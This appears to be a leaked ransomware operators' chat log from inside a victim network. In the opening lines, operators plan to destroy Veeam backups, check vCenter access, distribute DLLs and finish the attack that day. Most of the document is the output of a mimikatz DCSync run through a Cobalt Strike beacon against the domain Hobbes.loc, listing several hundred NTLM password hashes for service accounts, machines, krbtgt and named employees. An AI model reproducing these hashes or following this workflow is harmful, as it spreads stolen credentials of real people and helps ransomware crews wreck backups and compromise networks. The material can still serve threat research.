the backup servers are also marked in AD computers, also windows)
```
>description: vCenter 5.1 Server 2013
>description: vCenter 6.x
```
vcenter seems to be on windows
```
>operatingSystem: Windows Server 2008 R2 Standard
```
+
+
+
+
+
everyone here?
user9
user4
go through the techies, look for info on the backups, make sure there's access to vcenter (or that it's on windows and will get locked fine), see where veeam backs up to, and then it can be killed
Ok
why burn backdoors there for nothing?
then don't persist
if we're closing today
let's
Today?
I'll hand out the dll now
SOPHOS
sort the servers, etc.
and you can get it ready for closing
tell the AV right away
took two servers
found?
send the dlls @tl1
```
Teemo[PCHIDCG003]SYSTEM */4764|2020Dec11 00:33:52> dcsync Hobbes.loc [Tasked beacon to run mimikatz's @lsadump::dcsync /domain:Hobbes.loc /all /csv command [+] host called home, sent: 438858 bytes [+] received output: [DC] 'Hobbes.loc' will be the domain [DC] 'PCHIDCG003.Hobbes.loc' will be the DC server [DC] Exporting domain 'Hobbes.loc' 7351 TENG-ACCT$ 6d3a02a1dbfcc07957d1df41d5444768 2080 3781 SQLAgentCmdExec b3a7b463713310b416251471777fa0d3 66048 15301 SP_SSRS 076408f8e718dad08ad94a5e5019f762 66048 13103 SP_SRV 68a80609b1306f1e3add3f5b0c9ff181 66048 15642 SQLTESTDBUSER 2226330629e28473c4d290b17dcab0d0 524802 19340 SVC-Openfire-Admin a3f0910d49ba088a45d243438bcc48a2 66048 13964 IWAM_FS-0027 9a2f40bbb9ff1e39133e61b289a175ea 66048 19501 SVC-DCHIAPG001 cb26b90b52d067d83acfc65c2a3b4c0f 66048 4425 WS-0005 5281901e3711eaed959498ec917c2899 66050 19566 NLB-WEB01 b61901c0ca1611bb197131cd56943faf 66048 18841 RIVERBED 85ad7a16dda051d635ac3821b15a8271 16843264 13424 SP_Guest e6d9170e90f4a7e6f21280ed3c0517d1 66048 20202 SVC-RENDERFARM f62c5ee137914dd9ee56e91190121002 66048 17077 SP_FARM2 8cad7030797f2f44f72788f7f8a6b1f4 66048 13505 SP_GuestACS f2d438a9fe97ee2eaad900e0dd2c63b1 66048 15469 SQL-RPTSCHPHN a9bed826519203d82a8ae1c1432b1486 66048 18828 sh-0003$ cd40fb78af6248e3544a4af7478e0d 4096 20253 SVC-SPBACKUP c311b011bfc2f32edab6c95c0caf6fa3 66048 19564 SVC-DCHIAPG001-APP01 da15412388a03c8ac31dfcce8afd09b8 66048 20279 PCHIWSG009$ e52deef2201a59ed99dc0db24eb4b82f 4096 20733 PCHIWSG008$ 18daa9eebc41709766da594298307a07 4096 13502 SQL-vCenterAdmin a1940aad3133f4f21d61c22435b9fb65 66048 17002 SP_FARM 8cad7030797f2f44f72788f7f8a6b1f4 66048 12460 DCDHCP 68a80609b1306f1e3add3f5b0c9ff181 66048 16747 SSRSTengRpt 8c1542d97d9b79b48c06e1c07b07a232 66048 7721 EQLOANER 53f7c8703df697d350750a011e2fe088 66048 6310 SECMON 6b23cfaefade6334400928e42b6e2b5c 66048 16807 SQL-IRoARpt ee5ffe7df654e6904ab88711d8d94c78 66048 4316 Tririga Admin f3229ad17598f5bcd0b272d7670d8eb5 66050 20794 
SVC-SQL0005ToDMZSQL d77025566bfab9149fd7b2124675677f 66048 20281 SQL-DeltekToTengRO 5cec88ff3d9b6fb93510849984b6f452 514 3076 DILBERTXX 54229da8f8d221fc1aeb94f04d61ecc1 66048 19237 SVC-DCHIDBG001 8512ff5982fcd48d9ea4e717e225cd91 66048 21794 SPTestUser 6364271e1a2232e42ecb3406eeb8f823 512 19529 PCHIAPG004 3c7ea1911b9f90f57889716ef346e1c3 512 18080 WS-0007 68a80609b1306f1e3add3f5b0c9ff181 514 18748 VSSQL0003 90655ec9fe04e0b27291e5da2c0013b7 514 17857 VSSQL0002 7059bd4edfb8547c89108945313e7be4 514 19530 PCHIWSG003 7be11b959ab976ca7472f96d1b2560fb 514 19522 PCHIWSG002 6dfd7e3370334bd0744c9accd5c1061a 514 19521 PCHIWSG001 ad63cfb46defee50ed6b3dbb3b394ac1 514 21234 PCHIDCG002 21795387c0638972a387d8780383fa0d 514 19516 PCHIAPG003 69e793f4f0cdfb4cfe22a4f8ecdde1b2 514 19523 PCHIAPG002 559b2d5277ca59a70c1a839e6224ab59 514 12699 SP_IIS_APP01 076408f8e718dad08ad94a5e5019f762 514 12700 SP_IIS_APP_USACE 076408f8e718dad08ad94a5e5019f762 514 17193 sp_ACSgc 09f18ad0dfb95eece617c5cb6a6578ce 514 13116 ftbenningg1 e5ccb8571d2ff5323cc5012439b4e7 514 13504 _SP-ACS 076408f8e718dad08ad94a5e5019f762 66050 19707 sp_pmacs fb3f42647b2dc1d1fc3650cfbbcf9ed4 66050 13514 _SP_IRoA 076408f8e718dad08ad94a5e5019f762 66050 19708 sp_imacs fb3f42647b2dc1d1fc3650cfbbcf9ed4 66050 13576 sp_clientacs f2d438a9fe97ee2eaad900e0dd2c63b1 514 13123 _SP FtBenning 076408f8e718dad08ad94a5e5019f762 66050 13105 SP_SEARCH_SRV 076408f8e718dad08ad94a5e5019f762 66048 13400 sa-sharepointdba 076408f8e718dad08ad94a5e5019f762 66048 21245 SVC-CDR-CallLogDrop 65848727f354af155f640c7b978ccc6f 66048 15524 SQL-AppAuction a8641e863021a0097288225e2c3225ae 66048 19914 SVC-IROA-SP-IROA2DB ba8b91f6c6b4a57196b5f98dec0239b6 66048 18902 DCHIAPG001 eb8162e99613ee77d748ebef863beb97 66050 18903 PCHIAPG001 b1cd050101dc230f5c379b6a1edbe00f 66048 19742 SVC-ZENOSS 6e9d7f9b4eabc311d8fe548ccaf3827b 66048 20063 PCHIAPG002$ acf70e009b52f487059320b52dd8c415 4096 7353 CMICSUPPORT 24e07a99097e95374e2ba0fae7716c15 514 1975 EXCRES 
e28c2ffc7b411f62a01089a7d746c088 514 21785 LT-900223 bf89f60275e8e1e1b6ef9750d04da952 66048 34794 exmerge 757d1c465d04ef58ba57fd699f92b97c 512 22079 Terry.Thompson e491d1b24f392f21ce9a38070555bc3d 66050 33887 SP2013content 7b2784302223746c3ab288de4f44fb82 66048 33890 SP2013superreader ef18fad8d8c04de6b98191c55c228f87 66048 33883 SP2013install 505e41852a2bc9a2cf8dfeccee93ed08 66048 33891 SP2013sqlinstall d20c68065f87178df8f204838dcc3ad4 66048 34822 SCOMreader d44a4e4513964adca599356bed8a663e 66048 34825 SCOMwriter 12951f364679fe127dcca1369ea37101 66048 34812 SCOMdb 8e6d2e3f01be9ab7c510fb6960a734e5 66048 34835 pfink 9dc4be7322f4e85d97f8cd6d0a5e898d 66050 21233 krbtgt_29044 3f84d34fdca0041f3892f60692b2ebc9 514 15274 FS-0056 67dbfb53036906e36170593182eb7990 66048 13944 FW-0015 2c50e78ba2f50b0b8a83cd9b0757fb71 66048 13013 DEXTERRA ccc6930692ded0b8694ca5438d71081e 514 34734 splunk-test 174009eab65310987c9f0a53e0d2baca 514 37324 Jeff.Roemer 6131349933cb5fc2f2d65ee3bd57d295 514 37325 Zach.Gardner 5988814a367010a477b94e0f07b1e0f3 514 37326 Mark.Dvorak aecc10cfeb546d6fcebf6171e1ed99ba 514 37351 Steve.Dalo 37ac503d0e481716d218c2a6e74cce1b 514 36513 Bob.Jeffers 8ec39ee848b3dba7c1c0cc9fb650f906 514 36227 Raymond.Lowman 6e564b6f12b7feda82b04582fe65842f 514 37668 Duanne.Mclaine e82d29c0dfb2ad3d18dce800cd4cf390 514 22090 Loblaws 93b0ef17748fc3f0c228a298ce520e31 66050 20227 PCHIAPG008$ 488f797b3dcead9be0a6121b63ca6c0a 4096 33755 John.Williams a863beff0611411e77a091f169f2163f 514 22062 Mauro.Crestani 8c0219b11dcc34266444df1aa4c78d64 514 34332 Kathy.Ng 2aa01ad1babd992e685a997645e46e9f 514 37332 Todd.Hill 1ffbcdafa9d05573fdd2e0854633172a 514 34330 Chad.Groshart 2aa01ad1babd992e685a997645e46e9f 514 34331 Lee.Simon 2aa01ad1babd992e685a997645e46e9f 514 35872 Catherine.Leskowat d048edb521fd72258ede9f4bbbcb58d2 514 36525 Randy.Baccadutre fd111572adcc65e3d7bd4f284386b473 514 35817 Brad.Daniel 7e239559ff9da84f62f429c35943f46a 514 34333 Peter.Ellis 07759524c6fe35b1fb9227afd35a2bbd 514 36205 
Christina.McAlhaney d90e2ee11481a93453c8bdf53b667f8f 514 36522 Grace.Spear d84339a30ab9777b2a9b8265bc11b5ef 514 36511 Greg.Wys d84339a30ab9777b2a9b8265bc11b5ef 514 36510 Dennis.McNeil d84339a30ab9777b2a9b8265bc11b5ef 514 36509 Brian.Donnelly d84339a30ab9777b2a9b8265bc11b5ef 514 36512 Peter.Schreiber d84339a30ab9777b2a9b8265bc11b5ef 514 36209 Philip.Kerrigan 22b54f16e554f9cc50fca8990a621af2 514 34336 Ken.Neuhauser ea30d8683ffe121232568a7990c16066 514 34335 Chris.Schumacher 7324dee82144e76bcb64107fbfecffa7 514 34334 Alex.Lukachko 2aa01ad1babd992e685a997645e46e9f 514 22010 Christine.Brazill dcf1598abf0d61b14aa2c24a39e4f42a 514 21856 Daniel.Goodman cffcadaf230a1ba1697233f4ed8a9a37 66050 22013 DJ.Bailey dcf1598abf0d61b14aa2c24a39e4f42a 514 33769 Melinda.Fitter a1f97b707ceeb397aa667655180fdaee 514 22080 Richard.Eber 08844bb002c6fe66315e6e93efbb07 66050 37362 Bryan.Johnson 760712966d90ecf2ad3e341b354442b5 514 37363 Debra.Cohen 23997056a7dddf659383c3c769dbe579 514 37361 Jason.Popovic 55139ce93d8fc92fa3b0c1d33d530fa2 514 37364 Lauren.Martin 1429bbfdb4c18e80281ac488b8067b4e 514 36968 Bob.Beringer 88f525992fb5f7cc19c57a2fa86591e8 514 36969 Will.Pullen d27a63d44b2d08d1e64ef9c8ff0d0c07 514 36977 Tony.Puckett 85331a04a1942ecfbe71f4e65457f462 514 37244 Woodrow.Simms db2d316409094252cbab1030f1085a90 514 22124 Kathy.Weise 6364271e1a2232e42ecb3406eeb8f823 514 36228 Melody.Thomas b60e068b7a0cc33febb101d731dc0c97 514 21848 Ariz.Masters e774a9021f7fb9408c587688fc83d102 66050 21855 Jake.Carlile 00ae862ed0e75a057e61f0e0288907ad 66050 21957 Ryan.Reu 32ac246a362471660a42ea7ef29b5b68 514 33744 Matt.Hamrick 8ec39ee848b3dba7c1c0cc9fb650f906 514 33742 Jamie.Setter 2aa01ad1babd992e685a997645e46e9f 514 21894 Theresa.Bridges 434f2ce607a0b358588ca562ce973bd6 66050 21296 Siva.Haran fe81eca7d279885792038756911c4bf0 514 36230 Parviz.Mahdavi 990b6b0c2f6cc8e9e4e1e64bb2d9081e 514 22169 Samuel.Alexander 188d0a4fe11344f4a7de2922e85ad762 514 37202 Zach.Neill 6fd9968ade6bb14f41004f334e0d2b1d 514 37040 
Dick.Westrum fca7da4aa0f7ccdf315f8d4427844edd 514 36260 Michael.Bechtel 4f31dd7b47de4a64e8630eaa90bfff70 514 22146 Shannon.Parish cbb79b2fcfebacc3e3574f770a5d693a 514 33740 CalhounG 388cf9d9b3e302582fa7283ced787c77 66050 22171 Dawn.Austin b1eacb7a902f4a284597923ca0f46bfb 514 36224 Christina.Longbrake fdb56c6d2e5c63c544c11eff76dff87a 514 22170 James.Allen d2c66eef5e131b86998db5e0c2d07d19 514 36404 Matthew.Morris 2aa01ad1babd992e685a997645e46e9f 514 36402 Robert.Rugala 2aa01ad1babd992e685a997645e46e9f 514 36633 Michelle.Coghill 889d8b42a0afa88b47ee35993c25a578 514 37177 Tony.Rhein 0f5390bc3feca271d6495027956461f8 514 36213 Erik.Caylor 2aa01ad1babd992e685a997645e46e9f 514 36638 Jason.Schaffer 8ec39ee848b3dba7c1c0cc9fb650f906 514 37042 Fang.Li 13572a57e90ebe6a1970d36f1cd0ea55 514 22778 Tom.Lohner b60e068b7a0cc33febb101d731dc0c97 514 22077 Dave.Shreve 989b8f7d98643ef14c225350b9bbe792 514 36211 Robert.Rodrigues a071fdf94847e8cd2da25ebe89ceeada 514 22109 Jordan.Ehrig e414b39ab33c981a7e1c2cdfad97a68f 514 36527 James.Mierke 2c5b3e4e5b856464019245b74023ac39 514 36210 Jess.Cathcart f10cfa6ca0574cd41156d71123e81a47 514 36463 Richard.Poirier 9194da895682192b9ba9982040f1c50f 514 36232 John.Fabian 31796c39959f8a19933ccf8cdcfb5e77 514 22110 Russell.Laquey ce5f35539b189d06c867f70e268d0492 514 33741 EddyD 282f47af71f7d5585343f7d916991509 66050 22059 Justin.Sartler 4485e8c30594aaeb6f8d9fd743f1fb88 514 22039 Anthony.Herrera 5cbbafa3aa2fa9e4e0831be74a4c42e8 514 22076 Eric.Doan ed6a2f9660991407ec5d215be6232050 514 22040 Soledad.Angeles 5cbbafa3aa2fa9e4e0831be74a4c42e8 514 36226 Stephen.Holicky 2aa01ad1babd992e685a997645e46e9f 514 36466 Terry.Malloy 8ec39ee848b3dba7c1c0cc9fb650f906 514 36403 Terrence.Malloy 2aa01ad1babd992e685a997645e46e9f 514 22168 Chris.Beckman 014a91e14bed8e3231fb6c9aad77100d 514 22160 Joseph.DiGuglielmo 59f3f9675dbbc4fd677f296664430a19 514 22167 Christopher.Zwicky 2aa01ad1babd992e685a997645e46e9f 514 21958 Nicolae.Dumitru 7f4ca153e5ebb021f180d76395f0e8ba 514 36629 
Terry.Lackey 8ec39ee848b3dba7c1c0cc9fb650f906 514 36609 Jarrod.Cafaro faf1ffe186f89d6f211a831fbc9f642c 514 37350 Lauren.Young f30438fac4dd0556896448b6ef2babc7 514 36630 Andrew.Robertson f62b2e3f42926e2e2a5cd9cc40ba1c83 514 33751 Keith.Mueller d77cf4d5c3115e01e89f24cd8fa0f8d5 514 37450 Kyle.Williams 7c0413d4334c73bc404e88c8d1c676e4 514 21851 Julia.Maschek 20016d2585577b8144dcd8487a9ffc9c 514 36212 Anthony.Oplawski 312b75bf538ee3cf8cbc7453ae7a3f76 514 21974 Terry.McDonnell f3461c36556bf320e57b3cbc50e3f4b3 514 21898 Stephanie.Coad 6fd117a11f0fae1e0f14c5edf2c4e16d 514 36636 James.Grice 8ec39ee848b3dba7c1c0cc9fb650f906 514 36635 Jonathan.Pearson 8ec39ee848b3dba7c1c0cc9fb650f906 514 37365 Zack.Gordon f1b996d44a60a2aa7b18008ae64df6e9 514 37366 Kinan.Hayani c8ffcead279dd48bd3f5e2f6ff0dfb3d 514 37367 Michael.Nettesheim 14101484112ba3322b5fadd92b494ad2 514 36971 Brian.Poyant f7a5ece47465203cae2a5c7a3363a582 514 37141 Carl.Mankinen e4fa8721cd627408ab561ee7bdc3a8c8 514 36970 Rick.Nohmer fdc91a227a032e37717a8b2c2bfc91e6 514 36998 Kip.Paxton 7ce1e7f38bfb6582356623bcf135f5a9 514 36999 Jill.Poyant 816aba31601cba700b237e72f50f2883 514 36669 Randy.Webb 6a7cfdd4f82f2c84b862903bf63ee763 514 36670 Mike.Herrin f31c0b7c10b8e674378aba53a3a75710 514 36716 John.Yenges cc6d2624d64073e80446c1837e761074 514 22125 Darrell.Oyer fdadcf2f1a529285c5d445f6096bfab9 514 36610 Greg.Baughman 690b638dafc62a2d4f796b2f4d19fd35 514 36972 Reza.Alipanah 3f6ae10e05963bd2c19129f23da87b00 514 36973 Joseph.Alipanah faafb7501c67fe8097c07ac26e556a38 514 36975 Tommy.Gardner 9c42cb6942e1576b9a6dede8580542cc 514 36976 Joe.Wysocki 9c42cb6942e1576b9a6dede8580542cc 514 22176 Bill.Higginson a8d079ee5132707532738accdc15c8f7 514 22175 Glenn.Wilson 2aa01ad1babd992e685a997645e46e9f 514 22179 Zach.Peterson 2aa01ad1babd992e685a997645e46e9f 514 22178 Ashley.Peterson a74f35eb13031e426bb171271b0b4af6 514 22177 David.Affleck f8b29a627c7dcf5ad652a9c5a9ff0fb6 514 22174 Steve.Thomas 2aa01ad1babd992e685a997645e46e9f 514 36529 
Cameron.Baillie 56cd5f116dc7f4712a3de43902b1aa2f 514 36530 David.Paoli 56cd5f116dc7f4712a3de43902b1aa2f 514 35867 Rob.Downs 2aa01ad1babd992e685a997645e46e9f 514 36668 Steven.Below 6a7cfdd4f82f2c84b862903bf63ee763 514 36555 Susan.Martin e50022b17de0adcf659a3f322b1e85b8 514 36974 Mike.Beaver e47c5a89bebda342c81d45a9db85f51a 514 37359 Jason.Greenlaw 20e4633610456c807a78fc035487aa30 514 37360 Jill.Trundy f3cbf374df77527ef2e2a7545cc9de34 514 37356 Gregory.Hobbs 4c5e3b88f6370fd813fe14b0af71ea29 514 37358 Martin.Dodd 4e2bd4d1fd28bfaae676c4d79ef2ed32 514 37357 James.Stephenson a6952118b704b00afb9d8a0a7d102b62 514 36257 Eduardo.Obregon 8ec39ee848b3dba7c1c0cc9fb650f906 514 36255 Luis.Perez 2aa01ad1babd992e685a997645e46e9f 514 36258 Irbis.Gallegos 2aa01ad1babd992e685a997645e46e9f 514 37200 Mark.Watson e20b88eed2e169903256bb0421a0ec53 514 39294 SVC-SQL-TaskForcePow 9fb46b91e1ab932d1af23a88cb2ddc91 66048 37738 SophosSAUUSCHI-NET00 d57d4348693351112be0fa9278a4d89b 66048 38593 James.OReilly eb157dd24543080aa80f43eeb3120cfc 514 20234 QMMAD 7a0dc3b652f0bdf99c4b17616a81afca 66050 3190 WS-0002 68f01048eb4a48be9bfaf5907fba8b58 66050 34726 SH-0004 e841e88e29270c01ad6259a01fda98eb 66048 40235 HealthMailbox70e1a8b 922cf34124f2d39d14688a8dfe304e9b 66048 33990 HealthMailboxd742523 37826e702cdfa20af5b34a7bce795959 66048 33991 HealthMailbox40b9f47 f0b4b926cf7f77afeda9f73a9a7d3353 66048 39337 HealthMailbox6203626 20fb5125483e5ea0c0ac15206fed8be9 66048 40237 HealthMailbox0c1cc09 797e8c2a9a0e43ebd03d608a04a569d4 66048 33992 HealthMailbox0c511df 395585ac4500a1d6ff04dde66742ce45 66048 33993 HealthMailboxcc776b8 13c0165f5da8be3bd1938231e68d00f9 66048 39338 HealthMailbox013f4fe 5197cdf66ea1a0b99ce265492c8ef17e 66048 2616 WS-0001$ 61e80728dbe6e3df94e9d9f4b447cf2c 4096 38640 Patrick.Sauerland ce6423d90700388bf86e82acd146f73c 514 36315 Brittany.Charles fe2cd5868df7df9d2836d7c8dbf3906e 514 36628 Brian.Tackett 8ec39ee848b3dba7c1c0cc9fb650f906 514 38422 Nick.Dolan bede8fc9638c3ae7f3097e40e1486ecc 514 
36608 Kevin.Coughlin 64823b329d623b877e434ed3bfa8928b 514 36313 Craig.Mertes 02e6be1c4ad3b053b1d550dd1c934440 514 33986 Eduardo.Ceja 7ae821395c515177bd31fab7605ad182 514 33988 Nestor.Cheung d00f233863a63532e682a8ffe4c875e6 514 37669 Jed.Villanueva 098e8cf9c0dd66ad314cc601e0ba95ae 514 33920 Sushil.Kumar b65e1df746b823ee4558a657966fe1b1 514 33970 Ryan.Partelow 90f764c642fbe9275168d4a89d9d5fdb 514 33963 Hiroto.Uehara 954d585d6e1b2ea073b844cce8dfe2a8 514 37328 Melissa.Kiser 8842a3b1c46d245ca50dff760e311858 514 36573 Hanan.Zayed f424219111fc9f1c7f780099f2630f45 514 36528 Robert.Elfering 56cd5f116dc7f4712a3de43902b1aa2f 514 37576 Stephen.Solon 646e7e3a5df7ede12179195888d68db3 66050 21903 PWDCVHH001$ a1c9eadfe10ca8853406da043cac63ad 4096 15241 FS-0054 a5bd29c3aa75f850e81db1765e0db7f0 66048 40267 Will.Gamble de45dc1de8dbc21d224ddc27326f2ca6 514 39452 Nevin.Hedlund 8908f7ef07b75cd9cc8b9d7b6afe1197 514 39457 Lisa.Loftsgaarden c0070235639eb6e5528b8f20374f44b9 514 39454 Peter.Schlosser 8908f7ef07b75cd9cc8b9d7b6afe1197 514 20221 PCHIWSG003$ 867ef793fbea58e64c79e24231d6aac4 4096 19526 PCHIAPG004$ 90c9e14372b392f549a4c038a9f5bde2 4096 15240 FS-0054$ 21e602633427d61c33c755a5dba24e2b 4096 40236 HealthMailbox886a5d9 9be18554742f42d3e5170d75647ec907 66048 37739 USCHI-FSP002$ 16ed7460228fa0c02146ec54bc8b351b 4096 39336 HealthMailbox0f1d320 dc85692eab0c2dc215c2be4a9e9b51bf 66048 33758 David.Carroll 02e6be1c4ad3b053b1d550dd1c934440 514 36634 Max.Donahue 9b955f70969ef289c3d090d6115f53ec 514 38501 Ed.Duarte 02e6be1c4ad3b053b1d550dd1c934440 514 38590 Eric.Eitzen 6f804e9f2d320659fb5ce76a5b284887 514 40231 Akihiro.Yamamoto 7dc20f8af848c3515da349e62ff7a1ba 514 40228 Masao.Tachibana db11c7e89cc185b2f18940c7ad8247fb 514 40230 Isao.Koshida 738628e91d1a0f3276b98064ccc46e29 514 40229 Hiromi.Horie 954d585d6e1b2ea073b844cce8dfe2a8 514 38611 Tetsuo.Hayashi 2e1895e66ec1eb5cb7f9339aec1d57e9 514 38369 Joe.Murphy 946a6b469978e9b7665d9727b5de9d91 514 20133 SophosPureMessage 
e66cbf538dc42aae34e869cb6a9d6a80 66048 39643 HealthMailbox683009b c7424e4e34590acda308e3bdca255e6c 66048 40367 HealthMailbox2bf9eb5 3a1f8e5bcecd4be776130a6fcfb07b16 66048 18899 Richard.Diddams 42c37a7790419cee11e45bfadf9db5eb 514 20235 QMMEX 7a0dc3b652f0bdf99c4b17616a81afca 66050 15369 IPSENTRY-01$ 661d37f03698ca7567e987680fd33bee 4096 37649 Ethan.Dickenson b09fdec555b856fad310add9483229fb 514 33900 USMAI-FSG001$ ee093ef8bf9e12e0b437954863fd3fd5 4096 33888 SP2013userprofile e5308bd9012d6676d6a23e47ad1c222c 66048 18088 JOURNAL ef39c0015ee354b5b67636c658e8a28b 66048 13782 OOXADMIN a5bd29c3aa75f850e81db1765e0db7f0 66048 34837 USMAI-DCG001$ 21171d1c042eef750ed301b957ad3eb2 4096 37368 Satoshi.Mikami 79a7dcd88b2c38fb0e7c3528805d5939 514 40268 zuser1 b146bac21f72c77332fdf08e08d67e3c 512 40269 zuser2 b146bac21f72c77332fdf08e08d67e3c 512 7651 BEBACKUP 68a80609b1306f1e3add3f5b0c9ff181 66050 21753 DSA 5dd3afc6c55307c5e06b7986e4eb6e88 514 13963 IUSR_FS-0027 1e7e32cccb36f66e7a739382b044e8f6 66050 39544 Richard.Zych 9557ca53d791c1742083f2efc3a32975 514 39543 Michael.Bartos 9557ca53d791c1742083f2efc3a32975 514 39564 Andrew.VanHorn 9557ca53d791c1742083f2efc3a32975 514 39537 Andre.Towner ac175a71d879b6e4fe69b3b2be090c8d 514 34013 Richard.Suazo 3caab67e7519f63af70e6965a79efc54 514 37701 Bob.Stellmack 9557ca53d791c1742083f2efc3a32975 514 21959 Ron.Putlak ac175a71d879b6e4fe69b3b2be090c8d 514 37369 Takashi.Hattori 8b6ad1f99b927f62c8e5cc3bd65495d3 514 38534 Miriam.Betancourt 4e9bbdbc20caed4bc935994a2d6fac61 514 21284 PWDCFSG001$ 80da3ddebd99b6573f4b4138b8f3547b 4096 34947 Aaron.Schramm 18ea4714fc4b9dc06f9d5987e0c3645a 514 38321 Jorge.Sanchez 7d373b1d511d274dd853afd0600ad0a2 514 33987 David.Phan cb5fb1b52788249b274e9e83f32578c5 514 36225 Steven.Offringa b9e4ded6b36b47c99207d60cf1e91b37 514 34011 Mark.Obszanski 20d40784e3495f5fd16be79110b58ea0 514 37041 Scott.Henry d655b0e3151f4b7f7875c8d736b9c043 514 34012 Gary.Gosz ccde6a48e06d5131d6f7d91282ef51ec 514 37753 Nate.Gonner 
c4ebf760bc326da16d2d40b8a3165de3 514 39614 Garret.Forkan 49dc9d79c2a3f39aec7d6cd9de93bd2d 514 37766 Dion.Celebrado 8697132bb28033ab6e2567c4c060f780 514 39587 Adan.Castro e0ab99c7813ba3fa2020f32366a50e77 514 39605 Charles.Braucher bef05ba9dea4d763d77620e51bf33da8 514 39586 Nem.Djorovic 3aeda65bff9484c045b1aca0ee8cb6d2 514 34017 Inna.Markus e3f70d73ae7efc1d4d6614ece7aeca75 514 39339 Elijah.Wilson 517ff1723b54408b5be16f51d98ed762 514 39547 Patrick.Bocaya e16b64756523ec68b4d08da96e66ed07 514 34784 zuser b146bac21f72c77332fdf08e08d67e3c 514 21895 Jon.Miller e24728aeb7089f5bd9b067c665c35f74 514 37728 localadmin 9634d23b54a72dc30bee82e559286864 66050 38373 Curt.Merritt 5e9fe364a7b87330d58152e70c8d37e7 514 36662 Jennifer.Holmes 3aaabefebd0bafab3bf809c1a770eae3 514 37727 LT-000018$ a1ed4fe7686f29cd44ad7febb91ca139 4098 37446 Stacy.Ortiz 935b152f2e43dbe9344b85cb92d815e9 514 34070 Alexander.Karkazis 59b865a9e4aa135155664967a3fb62ba 514 34069 David.Chiconie 86f2c7ae8228a28d3df9a4a0eed552d9 514 38500 Sterling.Yates 9baaa3ec5dc352e22c68fd0c09f7d7b8 514 39585 Brian.Wackerman 3105656bd13a62dfdcc4e0ae269e91a3 514 39326 MININT-KSPEC9U$ ce3b8131ccefe6abaee9708fdea964e4 4098 39616 Reid.Wilhelm fc7c666beaf6a8ed0a6a0ee99debd2f1 514 21281 ProjectTesting 062d79436cccb59f71eedfc7d30a4f8d 66048 21280 FTPSAdmin cb896c2290d2bdceaa51027db9348823 66048 20229 SVC-vCenter 3ea865743db06297ea01d9ca41ebc3ba 66048 37374 Masaki.Tanabe 7b5f2987f815ab3c69cde9faafe47366 514 37370 Samson.Sy f2c115b8a70a79a97b14ef203e51dbf9 514 39581 Roger.Reckers 3105656bd13a62dfdcc4e0ae269e91a3 514 37372 Eisaku.Honda 9b0b7003b3d5a985063129307b6035b6 514 37373 Edgar.Domingo 54be16c9af21ca112faa6f6edf706d64 514 37375 Ernesto.Cruz f5b0e9b580a9ec06749528e3076a2a67 514 37286 Brian.Carino 27e14d8b1b083eb6f8b13677dd0e1524 514 36844 Mike.Kampwirth 6bde2d060d3dd07e89ab1aac3f2a4e80 514 34010 Jose.Hernandez 9e74ddb0b54dee70ec7afed42d27f3f9 514 34008 Jon.Haack 9e74ddb0b54dee70ec7afed42d27f3f9 514 34009 Sam.Feller 
4e7bc7306f4dded57e3b2de48a7123e2 514 34006 Romy.Espino 9e74ddb0b54dee70ec7afed42d27f3f9 514 33998 Lucas.Barker 9e74ddb0b54dee70ec7afed42d27f3f9 514 33999 Connor.Olberding 2f731f4c9465cc41c4099369d2d6160a 514 37487 Scott.Parkhurst b724bccada5622fdb597568f816836ae 514 19670 PCHIWSG004$ 3bd4459bc4ad749f9d5232eaa4219c9c 4096 20062 PCHIWSG002$ 065731dd4afc71f5b04f7640dece607a 4096 5619 FS-0029$ 604e96ea45dc3f9f4da6ec2d16f5877c 4096 40379 USCHI-WSG003$ 5b304547205120873443686b7310fac1 4096 33826 SVC-SpFarmAD 151ff4d3fd639f6932d84bd06a61db61 66048 22782 Info-Request 8df152f90d9b6d44887d7b3f289eb615 66048 40363 OD 7cae723808d12238a6d0aa770aa52edc 512 36486 USCHI-WSG101$ dc0846879b47b39829d7ebb34edaac49 4096 40470 SiegelH 6d8be855a5f0693361a43261fedcf7b3 514 40380 USCHI-DBG003$ 10b3ee346b2c0c4ecc83282cf09f03f8 4096 14196 FS-0051$ 220f686b803be26f918cb25f177b7261 4096 14197 FS-0051 68a80609b1306f1e3add3f5b0c9ff181 66048 22744 PCHIAPG005$ 6d668e9f57b6b3ecf852418aa1ec288b 4096 12568 FS-0044 4cfc1b7e31df9bd5b2bbdff79f63050b 66048 37744 Daniel.Lally fe09eb8b43cbc5f22ee844880e52892a 514 34072 Austin.Johnson 0658577a7c621753d82d7de9883f3ac1 514 39460 Robert.Nelson 994a58d1927a4e3b082091e4f83fb7b1 514 34074 Rob.Stankiewicz 020ba9e0aa5e8293b4df293bf7f46faf 514 38368 Craig.Pitts 5e17e575216e181add82aa61b71cba6e 514 34168 Brian.Sesterhenn 2bd212bbf8bd2b7ae34825a8bb471d24 514 40368 Robert.Judge 22fc5743e0f71979084c1d8e432ec3ae 514 22055 Steve.Citko 7375a54f0074a6704e75114b47107b9e 514 39666 Phil.Wilson b627a5ce7aa7a7c1b139e1becb3ce161 514 39878 Randy.Keel 78205cff50ecc8b94f555ff291cb8754 514 39879 Mark.Jarvis c0cabd93fbb86349c09f7d4e4ae82172 514 7471 WS-0006$ 2f476222cfe31447dfa1b6c295c9bde2 4096 33997 LT-000066$ e54e133cd487e7bfcddbf1471377df3e 4098 34002 Matt.Eagle e10ab818f17f720b600684694f2ec6f8 514 36320 ChenB 35422b292e2863d3aed087087db97464 514 22008 HillT 06bfbec796e0fd5aadeb53c397a9a219 514 34016 Chris.Bove cb9a405a12ce26ac44e6ba93e899e539 514 6798 SCANTO 
68a80609b1306f1e3add3f5b0c9ff181 66048 40602 USCHI-PWC001$ 3b754431cf649e6f91cb19c64ed0edae 4096 37752 USCHI-VCH001$ 1a155eaf2fce77d97ea235c7b975cdc3 4096 39822 PhillipsR bd43482b2e3009e39204b6c24453e3bd 514 40982 LT-000022$ 311e7cc83fd4b0ef92ebc5b913684032 4098 12563 FS-0044$ 4ba1e7321582a7ad47fe1d93137ce84d 4096 6796 GRABOWAP 9e96278cd96afad67f0fab1b9e720931 514 33867 FS-0027$ a93ba57ad821601582ef396846f3064e 4096 34856 LT-000040$ 71bd87cea4137d0c2a579ae4b322c6d2 4096 33917 LT-000045$ bd0a2a13a7a29fe90753fd3898c5f0be 4096 39981 LT-000042$ 879dd29c1e0b966b4829c0b935eda38e 4128 33968 LT-000050$ aeb2aaa7bb48357ec0bbb03922322379 4096 37140 TB-000009$ 4587b229f4927a9b16cbb53fa2d1ae70 4130 39820 TB-000016$ f787feb984291a436c1875b061fc7afa 4098 39997 JohnsT d0c0f866742fc5adecdbd7b2db49acc5 514 37506 